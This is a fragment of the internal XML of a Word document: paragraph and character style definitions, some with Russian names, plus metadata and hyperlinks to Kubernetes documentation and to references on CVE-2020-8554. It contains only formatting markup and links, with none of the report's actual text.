  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="2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56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E5653"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:aliases w:val="Заголовок раздела Char,H1 Char,Заголовок 1 уровень Char,1 УРОВЕНЬ Char,Знак Знак Char,Знак3 Char"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00403A26"/>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="9">
    <w:name w:val="заголовок 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00BF48C8"/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:right="84"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:aliases w:val="H2 Char"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00403A26"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:caps/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008C133A"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="31"/>
      </w:numPr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72480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E95F01"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
      <w:szCs w:val="28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BA1F4F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BA1F4F"/>
    <w:pPr>
      <w:keepLines/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lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="Рисунок"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="-"/>
    <w:qFormat/>
    <w:rsid w:val="009621CF"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:noProof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819"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28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819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8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819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81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table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00BE42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640BA5"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00ED50B4"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
      <w:szCs w:val="28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D50B4"/>
    <w:rPr>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="PlainTable2">
    <w:name w:val="Plain Table 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="42"/>
    <w:rsid w:val="00790AB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0">
    <w:name w:val="текст"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00212A36"/>
    <w:pPr>
      <w:spacing w:line="252" w:lineRule="auto"/>
      <w:ind w:firstLine="397"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21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46E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6E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6E76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6E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6E76"/>
    <w:rPr>
      <w:b/>
      <w:bCs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8D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618D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paragraph" w:customStyle="1" w:styleId="Beginingtitlelist">
    <w:name w:val="Begining title list"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="006757AF"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="30"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:caps w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Numeredlistparagraph">
    <w:name w:val="Numered list paragraph"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00F76F59"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="32"/>
      </w:numPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00F76F59"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7D296C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="007D296C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-1">
    <w:name w:val="список - ЦИФРЫ"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="006E0717"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="37"/>
      </w:numPr>
      <w:ind w:left="709" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-0">
    <w:name w:val="Подпись - ТАБЛИЦА"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="006A05EA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="40"/>
      </w:numPr>
      <w:ind w:left="567" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
    <w:name w:val="Подпись - РИСУНОК"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="006A05EA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="41"/>
      </w:numPr>
      <w:ind w:left="567" w:firstLine="0"/>
      <w:jc w:val="center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EB2400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B2400"/>
    <w:rPr>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteReference">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EB2400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7612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hyperlink" Target="https://minikube.sigs.k8s.io/docs/start/?arch=%2Fwindows%2Fx86-64%2Fstable%2F.exe+download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kubernetes.io/docs/hom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yperlink" Target="https://securitylabs.datadoghq.com/articles/unpatchable-kubernetes-vulnerabilities-cve-2020-8554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github.com/kubernetes/kubernetes/issues/97076" TargetMode="External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hyperlink" Target="https://nvd.nist.gov/vuln/detail/cve-2020-8554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5E82AF0C-1184-40EC-AB73-702F6482D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1313</TotalTime>
  <Pages>22</Pages>
  <Words>3404</Words>
  <Characters>19406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22765</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="108" baseType="variant">
      <vt:variant>
        <vt:i4>1310770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_Toc419969927</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770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_Toc419969926</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770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_Toc419969925</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770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_Toc419969924</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770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_Toc419969923</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770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_Toc419969922</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770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_Toc419969921</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770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_Toc419969920</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378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_Toc419969919</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378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_Toc419969918</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378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_Toc419969917</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378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_Toc419969916</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378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_Toc419969915</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378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_Toc419969914</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378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_Toc419969913</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378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_Toc419969912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_Toc419969911</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378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_Toc419969910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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Maks</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-10T12:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-08T15:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>